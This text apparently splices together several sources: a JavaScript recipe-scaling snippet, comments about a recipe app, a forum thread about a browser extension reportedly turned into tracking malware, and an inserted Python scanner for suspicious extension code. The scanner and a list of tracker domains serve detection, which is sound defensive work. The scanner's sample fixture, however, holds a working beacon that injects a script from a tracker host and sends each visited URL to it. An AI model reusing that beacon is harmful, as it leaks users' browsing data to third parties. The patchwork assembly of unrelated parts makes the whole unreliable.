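// Constructed, deliberately small unit list for the example.
const UNITS = new Set([
  "cup", "cups", "tsp", "tbsp", "oz", "lb", "lbs", "g", "kg", "ml", "l",
  "clove", "cloves", "can", "cans", "slice", "slices",
]);

// Mixed number (1 1/2), plain fraction (1/2), decimal (0.75) or integer,
// followed by optional whitespace and an optional word.
const QUANTITY_RE = /(\d+\s+\d+\/\d+|\d+\/\d+|\d*\.\d+|\d+)(\s*)([A-Za-z]+)?/g;

// "1 1/2" -> 1.5, "3/4" -> 0.75, "2" -> 2
function parseQuantity(text) {
  return text.trim().split(/\s+/).reduce((sum, part) => {
    if (part.includes("/")) {
      const [num, den] = part.split("/");
      return sum + Number(num) / Number(den);
    }
    return sum + Number(part);
  }, 0);
}

// Round to two decimals; String() prints whole numbers without a ".0".
function formatQuantity(n) {
  return String(Math.round(n * 100) / 100);
}

// Scale each quantity in the line by `factor`, keeping spacing and words intact.
function scaleIngredient(line, factor) {
  return line.replace(QUANTITY_RE, (match, qty, gap, word, offset) => {
    const leadsLine = line.slice(0, offset).trim() === "";
    const hasUnit = word !== undefined && UNITS.has(word.toLowerCase());
    if (!leadsLine && !hasUnit) return match; // e.g. "350" in "350 degrees" stays
    return formatQuantity(parseQuantity(qty) * factor) + gap + (word === undefined ? "" : word);
  });
}

console.log(scaleIngredient("1 large onion thinly sliced, about 2 cups", 2));
console.log(scaleIngredient("1 1/2 cups flour", 2));
console.log(scaleIngredient("bake at 350 degrees for 20 minutes", 2));
```

The unit-word heuristic is the interesting part: scaling only the first number under-scales the "about 2 cups" estimate, while scaling every number blindly would double a temperature, so some notion of which numbers are quantities is needed either way.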


> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.

I thought that was what the paid Cloud Sync feature was for. Does it not work for that?


I'm pretty sure Paprika Sync is free (with purchase of app) but yes, if you login to the same account it will sync (I used this with my partner very successfully). I think the person you are replying to is talking about having separate Paprika Sync accounts but still being able to share one-off or a subset of recipes.


Paprika is so good! There are a bunch of fit-and-finish details that tell me that it's being made by people who use it and who really care about listening to users.


I find it so ironic they'd buy out an extension specifically designed to defeat SEO blogspam, just to insert analytics-based monetization instead.


Thank you for sharing this, fancy_pantser. Are you the current maintainer also, or the current developer?

This is what capitalism looks like, folks. Someone "built it" so they now privately "own it", no matter how big it gets. It's not put into the hands of an organization. The profit motive is quite strong, which is why someone can be "corrupted" by very tempting messages like this. If you had a lake or a forest privately owned by one or two people, and they had a lot of debts, they could easily sell it to polluters and loggers.

Some people scoff and say "socialism has been tried, it never works." I admit that socialism simply trades one class of elites (the capitalists with a lot of shares) for another (the bureaucrats with a lot of political clout). BUT! I would like to say that socialism is not the only alternative. The other alternative is decentralized systems with no private ownership. I'm talking about science, open source software, and so on. There can be a Merkle tree of version updates (e.g. git version control) and each one can have various reputable organizations (like Zagat for software) building their reputation vetting it. Then, each community would run their own app store (think Wordpress plugins) which would work with these reputable organizations. There would be no heroes, no celebrities, no tweets at 3 am to 5 million people, no pulling from repos without peer review, no scientists instantly believed after publishing on arxiv.org .

Congratulations for building a popular extension, fancy_pantser. You live in a world where it's really bad to "criticize the profit", and where building it means you are responsible for it no matter how big it gets, but then we are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data. We can pass laws to punish people after the fact, or we can gradually change our culture by rejecting "immediate gratification" of updates that are not vetted, just as corporations have done with bleeding edge vs stable Linux distros etc. Unfortunately, the Web has made it so that anything can be updated at any time, with no sysadmins or reviewers in the loop. It's a wonder more malware isn't silently everywhere already.


> decentralized systems with no private ownership

aka anarchy. that turns out to be worse.


Yes, as we all know, open source software is a failed experiment, a cesspit of "anarchy".


Not open source. Open source is a resounding success. The marketplace with the problems is advertising. We need to enact laws banning selling of third party data and make leaks a liability (perhaps even one that automatically pierces the normal corporate veil and opens VPs and up to personal liability if there was any circumvention initiated encouraged by them). Then businesses have to actually decide if the liability is worth it for them vs a free-for-all market that intelligence agencies and criminal enterprises are primarily funding.


Most open source software is neither decentralized nor publicly owned.


All of it is, otherwise it wouldn't meet the 4 freedoms that define open source.

The 'project' maintaining the software may be centralized, but all its users "own" the software in the sense that they don't need to ask permission from the maintainer, and they can create their own modifications.


You're mixing a few different things. Free software and open source are different. And for each of them there are hundreds of different licenses that allow you to do something but not another.


Free software and open source are different marketing strategies for the same concept. The most commonly understood meaning for both terms is the same, from the very moment the Open Source Initiative was created.


As well as science, language and other human endeavors. No one is in charge! I’m glad society advanced so much from secret alchemy cults with their “intellectual property” protections on their secrets.


That’s a good description. A successful cesspit of anarchy.


What is your evidence?

Makhnovist Ukraine, Spanish Republic, and Zapatista country now...

All were/are quite different. Worse than what?


Ah, yes, the little project known as Debian completely failed and never took off. Anarchy is so bad. How could it ever produce anything of value, like say the world's most used Linux distribution?


Anarchy is simply absence of tall hierarchies.

You can have each individual community choose what OpenStreetMap tiles to use, what to censor etc.

Like HN does. What if HN was kicked off a host? They would put the backups somewhere else and repoint the DNS.

What if ICE seized their domain? Then we could move domain name resolution to a DHT.

What if AT&T refused to carry it or charge extra? The signal could route packets along other lines. No single point of failure.

It’s not just about banning 0% or 100% but the prices and friction imposed by privately owned rent-seeking infrastructure monopolies. Why, in a span of less than 10 years, VOIP has caused international calls that used to cost $3 a minute to turn free and have video!

The weird thing is that when A wants to connect with B you think there has to be a one-size-fits-all C that can block it.


"Anarchy is simply absence of tall hierarchies"

No it is not!


“I came here for an argument, this is mere contradiction.”


It seems you've misinterpreted the poster's intentions as if it should be illegal for a developer to do this. But he/she was merely informing users, and well-informed customers are a requirement for capitalism to work.

The cost of using this extension is your information, and there are other products available that do the same thing at a lower cost. Based on the most fundamental concept of economics (supply and demand), "The Great Suspender" should fail as a product very quickly.


It's incredible how many downvotes you got for this without any explanation. Your proposal sounds sensible and I agree that we need to find a new system. It doesn't have to be this that you described, but we should be open to change. Capitalism the way it is leads us in the wrong direction and socialism doesn't fare too much better in practice. We need to redraw a plan for the 21st century.


If I were to guess, it's down voted because when SKIMMED, it sounds like an off-topic, far too long, and overly political comment.

It's a fair comment, but only if you actually read it.


https://news.ycombinator.com/newsguidelines.html might be the reason why a lot of things here got downvoted. Specifically:

Please don't use Hacker News for political or ideological battle. It tramples curiosity.


Discouraging political discussions is a very political thing in itself. The comment we are discussing might not be a great example of encouraging curiosity, but being the person that says "don't be so political" is complacent and ignorant. We arrived at the current situation due to political decisions and a political process.

I am not accusing you of being that person, nor anyone else. I am just tired of people not seeing that upholding the current situation is as political as criticizing it. This discussion made me try to put it in words.


But part of a curiosity-based discussion is also trying to satisfy the curiosity of others by providing answers. The most insightful and thought-provoking of those can sometimes be rather “political”, because the things we think about and are curious about are.


this doesn't read like a battle, though. one could argue that opinions that run counter to the generally accepted norm are inherently good for curiosity.


It is indeed incredible. As I said, you cannot “criticize the profit” in the USA without losing social standing. Capitalism is a national religion because people think the only alternative is socialism (collective ownership of the means of production - which btw isn’t scary on small levels) and the USA fought a cold war with USSR for decades.

That’s why there will be a third party in the USA that unites disaffected progressives on the left with disaffected paleoconservatives on the right. A lot of people are fed up with the divisions.

I welcome counterpoints and debate but as you can see — there are just silent downvotes instead


You're probably being downvoted because even if your critique might be thoughtful at some parts, it is also quite snarky and smarmy at the beginning, and sounds like it's posing an ideological battle. Starting at the third sentence, "This is what capitalism looks like, folks." In fact, you're still doing it, "Capitalism is a national religion..."

Do you think people on HN want to engage with your comments when you're saying they're foolishly clinging to a religious belief?

By the way, this was a decent point: "[W]e are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data." Maybe this thread would be different if you stayed with points like that instead of accusing people of harboring religious beliefs that pulls the wool over our eyes, preventing us from seeing things your way.


> Do you think people on HN want to engage with your comments when you're saying they're foolishly clinging to a religious belief?

To be fair you inserted "foolishly clinging", and are now blaming them for something they did not actually say.

Capitalism is highly akin to religion - they're not the first and will not be the last to draw that comparison, and plenty of words have already been written on the topic. If your response to reading "capitalism is a national religion" is to assume you're being insulted, perhaps consider that the statement may be more true than you think.


Off topic, but....

There is unlikely to be a third party in USA as the system is designed to have two parties.

There may be a third party that forces the Dems and GoP to unite, back to two...


This is really Google's fault. They make it impossible to turn off automatic updates for Chrome extensions from their store. That would be kind-of-ok if they actually had a rigorous approval process. But they don't. The Chrome Web Store has become one of the prime vectors for malware. The only way to be safe is to exclusively download releases from the extension's GitHub repo and to manually install them.


In general, taking control away from users sets up all kind of bad incentives. For example, automatic updates with no way to downgrade save vendors from having to compete with their own older versions. This means regressions in functionality or design can be pushed out with little recourse for users other than complaining online. This is compounded by ecosystem lock-in and lack of data portability. The software industry as a whole is heading towards treating users more and more paternalistically.


Conversely, before automatic updates web developers were stuck supporting Internet Explorer for the best part of twenty years. Many of the people using it had neither reason nor knowledge to update it, and it became the reason my parents' computers got riddled with malware.

There's a sensible middle ground here. Take the paternalistic approach that (generally) protects people like my mum. Add settings that allow people like you and me to turn off updates or roll backwards. Push the people controlling the updates (like the Chrome store) to better protect their users.


Users need to be motivated to upgrade. If their current software works sufficiently on the sites they care about, then they have no need to upgrade. If the sites themselves are enabling this behavior, by bending over backwards to work with old browsers, then they are part of the “problem”.

I don’t like automatic updates and generally keep them disabled. Software upgrades tend to reduce functionality and instead force unnecessary UX redesigns on users, so I’d rather avoid them. I wish developers had the [EDIT: incentive] to release security patches independently from functionality changes, but few do that anymore, sadly.


It's been an age since I've worked in an agency, but back in the IE era, at least once a month a dev would ask to use a 'modern feature'. Something to support some new piece of design from the design team, or save hours or days of dev, or remove the need for hacky 'fixes' that could be done cleanly with modern browser support.

So off to analytics they would go. "X thousand users are using IE8. We're converting at X%. Removing support for IE8 just means these people will shop elsewhere and we'll lose X thousand pounds a month. You need to support IE8."

Believe me, I wish it was as simple as saying developers are "part of the problem," because it would be an easy fix. But try selling that (without a huuuuge struggle!) to the person who holds the purse strings.

Sadly the new features usually only came on new sites. It's much easier to push it through when you're not cutting off an existing income stream.


>I wish developers had the competence to release security patches independently from functionality changes, but few do that anymore, sadly.

You do realize it's not competence developers are lacking, it's resources that are finite, don't you?


Despite automatic updates, web developers are still stuck with Safari, IE, old android browsers and old edge. Automation doesn't help with bugs and functionality if there are just no updates to be installed that fix bugs and bring new functionality.


>Conversely, before automatic updates web developers were stuck supporting Internet Explorer for the best part of twenty years. Many of the people using it had neither reason or knowledge to update it, and it became the reason my parent's computers got riddled with malware.

The failure is not that of Internet Explorer, but rather the OS in which it runs, which has a faulty security model. No operating system should trust executables with everything by default.


It wasn’t faulty at the time since people were more concerned about protecting computers from users than protecting users from applications.

We all seem to forget that computing has changed drastically in the last decade.


I would say that "protecting users from applications" (or at least, external attackers) has been commonplace for maybe even two decades now, ever since major malware 'plagues' of the early 2000s (pre-SP2 Windows XP) like Blaster or Sasser.

That said, in that era it was often assumed (more so than now) that software the user installed himself is trusted.


Internet Explorer was only replaced by automatic updates after its usage fell enough that sites stopped supporting it.


The major problem with Internet Explorer was that it was impossible to update without updating Windows, which costs money, so most people and organizations didn't do it.


I don't mind automatic updates per se as long as they're thoroughly checked and vetted. I'm not convinced Android and the Chrome web store do ANY checking / vetting. I have more trust in Apple's stores.

Vetting could be better with a lot of companies as well; remember not so long ago when Windows Defender decided a critical system file was malware and broke a ton of systems?

Verification. Vetting. Gradual release. Automatically disable extensions if they changed ownership, or if there's suspicious activity on the account of the owner (e.g. new login in another country).

And they need to take a MUCH harder stance on malware. Right now they're not even acknowledging there's a problem, let alone acting on it.


For any extension that makes any money, the solution is a deposit scheme.

"Google will withhold $1 per user of your ad revenue forever. If your extension is found to contain malware, you forfeit all the $1's. Decisions on malware'y ness shall be made by XYZ malware researchers."

Allow a developer to get back their $1 when a user uninstalls the extension, or the developer stops making the extension. Also give the developer a certificate anytime showing how many $1's you hold of theirs (they could use that to get a loan from someone willing to trust them not to distribute malware).


Not really a solution, just the minimum price a buyer would need to pay.


True. But even the most profitable malware won't want to forfeit hundreds of millions of dollars for a popular chrome extension.


On the other hand users are generally pretty poor at managing software themselves and as long as it works they'll happily and probably ignorantly run something that is not secure already and needs an update.


> users are generally pretty poor at managing software

This is an assertion which begs many questions.

Who are these users? What do you mean by "generally"? What do you mean by "poor"? What do you mean by "managing software"? Which software specifically? Why is "managing software" hard? What are specific cases where this might be true? Is this statement falsifiable?

For instance, how does age, social background, education level, language, culture,... factor into the experience of "managing software"? Surely, the problem can't be software itself in its entirety?

See, statements like these tend to break down once you start digging into the murky nuances and specificities of reality.

Moreover, accepting them at face value tends to reinforce a belief which isn't based on fact: that the users of digital technology can't manage their devices, and therefore shouldn't be confronted with managing their devices.

... which is then translated and implemented in interfaces and systems that simply lack the functionality that gives users fine grained control over what is or isn't installed.

Over a longer term, this promotes a form of "lazy thinking" in which users simply don't question what happens under the hood of their devices. Sure, people are aware of the many issues concerning privacy, personal data, security and so on. But ask them how they could make a meaningful change, and the answers will be limited to what's possible within the limitations of what the device offers.

A great example of this would be people using a post-it to cover the camera in the laptop bezel.

People don't know what happens inside their machine, they don't trust what happens on their machine, and there's no meaningful possibility to look under the hood and come to a proper understanding... so they revert to the next sensible thing they have: taping a post-it over the lens.

The post-it doesn't solve the underlying issue - a lack of understanding which was cultivated - but it does solve a particular symptom: the inability to control what that camera does.


It really doesn't beg those questions - we have 25+ years of data backing it up. People across the board are bad about running updates. I'm guessing you missed the mid-late 90s when things like buffer overflows started to be exploited and firewalls became necessities because even the folks whose job it was to run updates of vulnerable systems with public IPs on the Internet... weren't. Then came the early 2000s and all the worms running amok because people still weren't running their updates. Then the collective web development industry screamed in pain because things like Windows XP and IE6 just would not die.

The collective Internet has been through this before and (mostly) learned its lesson. People don't run updates when it's not shoved down their throat. And it's not a small segment of people. And it hasn't changed. Look at how many hacks still happen because of servers and apps that aren't patched for known vulnerabilities. Or the prevalence of cryptojacking which is still largely based on known vulnerabilities that already have patches available - indicating it's successful enough that people keep doing it.

Most users don't question what happens under the hood of their devices because they don't care. They have other things to care about that actually mean something to them besides the nuances of the day to day maintenance of their devices. There does not exist an effective way of making people care about things like this, let alone educating the masses on how to appropriately choose which commit hash of their favorite browser extension they should really be on. How many security newsletters do you really expect the average person to be subscribed to in order to make informed decisions about these things?

Hell my "Update" notification on Chrome is red this morning and I'm at least in the top 10% of security-conscious folks in the world (it's really not a high bar).

I'm not saying automatic updates are without their problems - I'm in a thread on HN about that exact thing. But trying to claim it's somehow about sociodemographic issues and the answer is solving that and going back to selectively running updates is just ignoring the lessons of the past.


I, and everyone else I know, do not install updates to our software in a timely manner unless we actively need a feature.

Users are "I, and everyone else I know".

Generally is "unless we need a feature".

Poor is "do not install updates to our software".

Managing software is "install updates".

Software is any software we use that provides updates, which is all of it.

Managing software is hard because doing it manually would require checking the website of every piece of software you've ever downloaded at regular intervals, where regular could be as frequently as minutes for security-critical tools.

If I ever downgrade my software and lock it to a specific version, I am now managing it manually, and all of the above applies.

I honestly don't think there are unquestioned assumptions here, because the task of keeping security-critical software up to date manually is nearly impossible for any user.


I honestly am not at all sure what you mean by much of that.

Demographics don't change the fact that if you don't automatically update software, many users simply won't. That's bad.


... in the usual pedantry of HN your use of "poor" was interpreted to mean socio-economic, rather than... "just bad at something"...


I don’t see how one could parse ”On the other hand users are generally pretty poor at managing software themselves” and assign that interpretation to “poor”.


I agree, but the user who responded to me seemed to talk about demographics as if I had meant "poor" as in not having much money.

The internet is global, sometimes I think things get lost in translation.


That's a reductionist reading of my comment.

I'm challenging your initial assertion that "people are poor at managing software". That's not enough of an explanation to support the second part of your claim:

> and as long as it works they'll happily and probably ignorantly run something that is not secure already and needs an update.

Are they poor at managing software because they are ignorantly running insecure software? Or are they ignorantly running insecure software because they are poor at managing software?

The replies so far take the entire context out of the picture and reframe the issue to "Users use their devices the 'wrong way'." and this can only be solved through technological advances.

I'm here questioning and challenging those assertions.


Oh I see. That's weird, but thanks for letting me know.


That would cover users who are poor at managing software. Being able to turn them off would require someone to be good at managing software. Why remove control from those users?


I don't want to be saying that we should remove control, but I actually do think it's reasonable to. Even on a single-user device, security issues are not isolated. An infected machine will likely be used for things like spam and DDOS.

If you make something available for people to toggle that improves their experience, people are going to take advantage of that even if they don't really grasp or decide to ignore the consequences. In the case of updates the improved experience is not being nagged or forced to restart an application or the whole OS. And unfortunately the only way to really gatekeep that control to people who know what they're doing is giving it enterprise pricing.


I want to think that folks who would choose that option would be responsible, but the amount I hear from other developers who defer updates on Windows 10 to the maximum (1 year...) and still are upset when they have to reboot makes me think that even experienced users present a risk.


Users never upgrading their software certainly also leads to security problems though, it's not a solution, and it is reasonable to try to set things up so this doesn't happen.


Wouldn't an easy solution be to turn auto updates on by default, and warn users that turn it off that they are opening themselves up to potential security issues, and to do so wisely?


The issue comes when an auto update regresses something that the user relied upon. As long as the automatic update has a 'downgrade' option that's tenable but most of the solutions out there make downgrading difficult.

I prefer automatic updates that are presented to the user for action, sadly feature update/release notes are often hidden or content-free (cf. Google's apps' updates on the Play Store) and downgrading path varies heavily with OS (easy on Linux, impossible on iOS).


Good point, being able to roll back to a specific release would be very handy.


Sure, that'd be one solution. I wonder how many users would end up with auto-updates off, and how many of them would actually understand the risk.

Many users are going to change configuration because some tutorial on the internet somewhere tells them to do it, without totally understanding what they are doing, and are unlikely to revisit this configuration again ever. (Heck, I have done that with some configurations I don't totally understand, and don't even remember what I did and will never revisit to change back).

But it might be a fine way to do it.

But in analysis there is a shift from "can we blame someone else [users who ignored our advice] if the ecosystem ends up very insecure", to "how do we actually keep the ecosystem secure, not just have someone to blame when it isn't?" Doing the latter while also providing for user flexibility and autonomy can be a challenge for sure.


I don't think turning automatic updates off would be the right way to deal with this. See: Windows. If a piece of software becomes malware it needs to either be forked or retired completely; running unmaintained legacy versions of software is not sustainable.

I have plenty of things I want to complain about when it comes to Google's user-adversity but mandatory automatic updates is definitely not one of them.

If you're a technical user and really know (or really think that you know) what you're doing there are ways to effectively freeze a given version of an extension.


Or just add permissions and ask the user when the extension asks for new ones? e.g. permission to talk to the outside world that something like TGS shouldn't need to just do its job.


It already does. If a new release of the extension requires new permission, it gets disabled till the user gives consent.


I never even patch automatic updates to my OS either (e.g. macOS Big Sur). I'd rather not guinea pig the latest updates and they usually don't add all that much value for Chrome extension releases either, so a way to turn off automatic updates in Chrome is highly desirable for me.

Downloading and unpacking from GitHub is a pita, I'd need to do this on each of my computers separately.


This is a terrible security practice.

Switch to Chromium and use a package manager to stay up to date. Don't freeze updates, especially on your browser.


I work in software. I know the dangers of a day 0 exploit. I also know the dangers of an x.0 release of software.

Security is often in tension with convenience/usability (as in this case).

Concretely: I don't update to the latest MacOS day of release. I do update after a few weeks of "no significant issues reported" (or I'll update manually faster if I learn of a serious exploit). I still haven't updated to BigSur as some of the software that I rely on doesn't work on BigSur yet, so I'm on the latest patch of Catalina.


I'm not going to update to a new MacOS "named" release until it's been out for a while and probably has a patch release or two, agreed.

But I install MacOS patch releases as soon as they are offered. It has never caused me a problem I am aware of, and I don't want to miss out on security patches, or even just bugfixes and perf improvements.

Heck, I actually just upgraded a MacBook that was still on 10.12, which was EOL'd. But I upgraded it because it was EOL'd, and wasn't getting patch releases for security fixes, and I want those patch releases as soon as they are released!


You should let clients and users know that you care more about convenience than security so that they can make an informed decision about whether to trust their data with you.

I don't know what x.0 software updates you're talking about (Chrome or Mac), but my comment never mentioned any. You don't seem to know that browser vendors don't really do those like OS vendors do. Either way, you can still avoid those while getting security updates.

In my memory, there hasn't been a breaking auto-update in Chrome in years, but there have been hundreds of 0-days. The numbers don't really work out for the tradeoff you claim to be making.


>The only way to be safe is to exclusively download releases from the extensions github repo and to manually install them.

Or not use chrome


The fact that Google has not addressed this gaping security hole in Chrome is borderline criminal.


You can do better to voice your displeasure by not stretching credulity.


It's hyperbole. Welcome to the Internet.


Here's a list of other extensions which have recently been flagged by the community for similar behaviour:

- Auto Refresh Premium, static.trckljanalytic.com

- Stream Video Downloader, static.trckpath.com

- Custom Feed for Facebook, api.trackized.com

- Notifications for Instagram, pc.findanalytic.com

- Flash Video Downloader, static.trackivation.com

- Ratings Preview for YouTube, cdn.webtraanalytica.com

Copied from https://github.com/greatsuspender/thegreatsuspender/issues/1...


My wife installed an addon to be able to post Instagram posts from her laptop, and then suddenly clicking on Google search results would sometimes, but not always, hijack and redirect to Bing, and then click on one of the ads. But it was clever because it only happened sometimes, and if she retried it it didn't happen, so whenever she would try to show me, it didn't happen. I just removed all her addons and the problem went away, so not sure which one it was.


It's things like this that make me a lot more reluctant to install extensions that might be moderately convenient. Maybe they're okay now, but it's too much of a burden to keep track of what I have installed and which ones are known to be doing something nasty.

Another loser in this whole game is the honest hobby extension developers, who have to deal with the power-users who might promote their extensions not wanting to bother for fear of not being able to keep a watch for potential malicious updates for all of them.


I wonder how many of those tracking websites or even the extensions themselves are owned by the same entity. That's a pretty common practice.


Is there an extension that can track my extensions?


I was just thinking about something similar. It would be nice if at a minimum, we could put together a list of compromised extensions. I feel like I've seen quite a few of these reports recently


It should be possible to look at the source code of known compromised extensions and put together a list of heuristics that could automate part of the process. Minifiers make it more difficult though.
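A minimal version of that heuristic pass, as an added example (not code from The Great Suspender, from anyone in this thread, or from an existing scanner). It walks an unpacked extension as a `{path: text}` mapping, flags broad host permissions and sensitive API permissions in the manifest, then greps the scripts for dynamic-code idioms (`eval`, `new Function`, injected `<script>` tags, `atob`, long base64 literals) and for remote hosts that are either on the list of domains posted above or not covered by the manifest's host patterns. The sample bundle at the bottom is constructed for the example. As the comment says, minification defeats most of these regexes, so a clean result means "nothing obvious", not "safe".

```python
"""Heuristic triage of an unpacked browser extension for injected tracking or
monetisation code.  Added example; the indicator domains are the ones listed
in this thread, everything else is a generic heuristic, not proof of malice."""
import json
import os
import re

# Domains reported in this thread for extensions flagged by the community.
KNOWN_TRACKER_DOMAINS = {
    "static.trckljanalytic.com", "static.trckpath.com", "api.trackized.com",
    "pc.findanalytic.com", "static.trackivation.com", "cdn.webtraanalytica.com",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_PERMS = {"webRequest", "webRequestBlocking", "cookies", "history", "proxy", "scripting"}
# Dynamic-code and remote-loading idioms that a tab suspender has no business using.
CODE_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "new-function": re.compile(r"\bnew\s+Function\s*\("),
    "remote-script": re.compile(r"""createElement\s*\(\s*['"]script['"]\s*\)"""),
    "base64-blob": re.compile(r"""['"][A-Za-z0-9+/]{200,}={0,2}['"]"""),
    "atob": re.compile(r"\batob\s*\("),
}
URL_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def pattern_host(pattern):
    """Host part of a match pattern: 'https://*.example.org/*' -> '*.example.org'."""
    return "*" if pattern == "<all_urls>" else pattern.partition("://")[2].split("/", 1)[0]


def host_declared(host, host_patterns):
    """True if `host` falls under one of the manifest's host patterns."""
    for p in host_patterns:
        h = pattern_host(p)
        if h == "*" or h == host:
            return True
        if h.startswith("*.") and (host == h[2:] or host.endswith(h[1:])):
            return True
    return False


def load_dir(root):
    """Read an unpacked extension directory into the mapping scan() takes."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files


def scan(files):
    """Return (severity, rule, location, detail) tuples for one extension."""
    findings = []
    manifest = json.loads(files.get("manifest.json", "{}"))
    perms = set(manifest.get("permissions", []))
    hosts = {p for p in perms if "://" in p or p == "<all_urls>"}
    hosts |= set(manifest.get("host_permissions", []))  # MV3 keeps these separate
    if hosts & BROAD_HOSTS:
        findings.append(("info", "broad-host-permission", "manifest.json", sorted(hosts & BROAD_HOSTS)))
    for p in sorted(SENSITIVE_PERMS & perms):
        findings.append(("info", "sensitive-permission", "manifest.json", p))

    for path, text in files.items():
        if path == "manifest.json" or not path.endswith((".js", ".html")):
            continue
        for rule, rx in CODE_PATTERNS.items():
            for m in rx.finditer(text):
                where = f"{path}:{text.count(chr(10), 0, m.start()) + 1}"
                findings.append(("warn", rule, where, m.group(0)[:40]))
        for m in URL_RE.finditer(text):
            host = m.group(1).lower()
            where = f"{path}:{text.count(chr(10), 0, m.start()) + 1}"
            if host in KNOWN_TRACKER_DOMAINS:
                findings.append(("high", "known-tracker-domain", where, host))
            elif not host_declared(host, hosts):
                findings.append(("warn", "undeclared-remote-host", where, host))
    return findings


# Constructed sample bundle (not a real extension): a suspender whose background
# script grew a remote script loader and a base64-decoded config in an update.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 2, "name": "Sample Suspender", "version": "1.2.0",
        "permissions": ["tabs", "storage", "https://*.example.org/*"],
    }),
    "background.js": r"""
const STATE_URL = "https://api.example.org/v1/state";
function beacon(url) {
  var s = document.createElement('script');
  s.src = "https://static.trckljanalytic.com/t.js?u=" + encodeURIComponent(url);
  document.head.appendChild(s);
}
const cfg = JSON.parse(atob("eyJlbmFibGVkIjogdHJ1ZX0="));
""",
}
```

Running `scan(load_dir("/path/to/unpacked-extension"))` on a real bundle gives the same tuple list; for a `.crx` or `.xpi`, unzip it first (a `.crx` has a small header before the zip payload). The `undeclared-remote-host` rule is the one most worth keeping: an extension that talks to a host its manifest never mentions is exactly the "analytics to ship home" pattern described at the top of this thread.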


You should be able to do some of that at the debug console level. But otherwise you're stuck tracking traffic at page level, at least as far as I know.


My general policy is to never install any extension that has full browser access. Except if it's from the FAANG companies themselves.


I wonder whether paying for extensions could be a way to build more trust.


Quick note about the workaround mentioned in this article - the suggestion to download the last known good version of the extension and sideload it is a good one, but it has some problems on Chrome.

Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.

One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)

Use Firefox.


> Use Firefox.

Firefox has similar restrictions... you have to side load through Developer Options. If you’re not a developer, you will be questioning why you’re doing this and the less-technically inclined will simply never do it (like my wife)

And it is not entirely nefarious as you suggest. It limits the damage that sideloaded extensions did in roughly 2010 and earlier. The WebExtension API was another assault on extensions. These days, Chrome and Firefox have essentially closed a huge attack vector even though extensions are a shadow of their former selves. I was a skeptic for a long time (why should power users pay for the faults of everyone else?) but no more. Kudos.


Kudos?

Availability is part of security, and the most secure system is disconnected from the internet and powered off. Why are we cheering our software becoming less useful in the name of safety? The switch to WebExtensions was a monstrous loss of functionality!


Chrome sideloads extensions through a similarly obscure menu - My main quarrel is the prompt where the default option is to uninstall that appears on every launch. Firefox doesn't have that.

Firefox also permits self-hosting extensions signed through their store, providing more freedom for extension developers.


Yeah, I kind of hate it, but I can't really blame them for doing it. Before they did that, if you installed software from questionable sources like, say, Java from the Oracle website, it would bundle an Ask toolbar with it. And this was so common.


> you have to side load through Developer Options

I'm not sure what screen "Developer Options" is referring to, but you can load add-ons directly from your hard drive with no fuss from the Add-ons page (though you must be running the Nightly or Developer version of Firefox). Click the gear icon right above your list of installed add-ons (this is also the menu that lets you disable auto-updates).


So you have to use an experimental version of Firefox. These nightly versions are less tested and can be a serious downgrade from any stable browser.

That's hardly what "Use Firefox" implied.


I can see why you'd think that but in practice I assure you that your concern is unwarranted. I've been using Nightly Firefox exclusively for almost ten years and I honestly can't remember it ever crashing (excluding the times when I was manually futzing with experimental about:config flags back in the electrolysis days).

As for the developer edition, it's literally the version that they expect web developers to use; it's not half-baked software by any means.


"Stable" doesn't necessarily mean that it is secure, from an end-user perspective.


Do you have any stories or articles that corroborate that nightly is less secure?


You can use unbranded builds which are pretty much identical to the stable releases but let you use unsigned extensions.

https://wiki.mozilla.org/Add-ons/Extension_Signing#Unbranded...


The Developer Edition is not a nightly build, it’s a beta build, so there has been some testing (Before I switched to stable, I only once had an issue). Your point stands though.


Installing extensions from a file is supported in the latest mainline FF (84.0.2), nightly or dev are not required. I currently have one installed. It just shows a confirmation dialog and then installs it.


This is true but misleading: the extension you install from file has to be signed by Mozilla in exactly the same way that extensions on the store are signed.


You can remove the signature requirement on stable by setting `xpinstall.signatures.required` to `false` in your user.js / about:config

(I wrote most of the extensions I installed for my own bespoke use, built them locally as zip files and installed them via "Install Add-on From File...", and I don't have a problem trusting myself.)


I don't think this is true for the official Mozilla builds (except for Nightly, Beta and unbranded). It's possible that your distro has a custom build that allows the setting. Arch builds Firefox with `--allow-addon-sideload` which could be the culprit.


Ah indeed. My distro also builds with `--allow-addon-sideload`


No promises that that's actually the right flag. I had a rummage around searchfox and it looks like that just enables extensions that have been placed in special directories (whether they must be signed or not is a different flag). There clearly is a setting somewhere though as the unbranded builds exist...


Signed XPIs are valid for eternity*, and you can just re-sign it for free if you really care about it.

* Unless it was explicitly revoked (updates do not revoke the signature) or Mozilla broke something that affects everything.


> Chrome will issue an ominous warning on every launch.

That's Google's shtick. They do the same if you unlock the bootloader on your Android phone. Black nag screen with scary text on every reboot.


> Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.

I've been sideloading vimium and thegreatsuspender for years and I haven't seen this message ever. Not on Mac nor Linux.


You could download it and publish it yourself. I have an extension I wrote myself, and while I occasionally see something about having to pay $5 in the extension management panel, it never forces me to do so. If they closed that hole, perhaps it's worth the $5 developer registration fee to some.


When did you publish your extension? I'm an extension developer that makes a mildly popular extension used by a niche group (1-2k MAU) and the Chrome Web Store has tightened their policies over the years. It's possible that you're grandfathered in (and haven't hit any of the extra reporting requirements if you haven't updated your extension recently.)

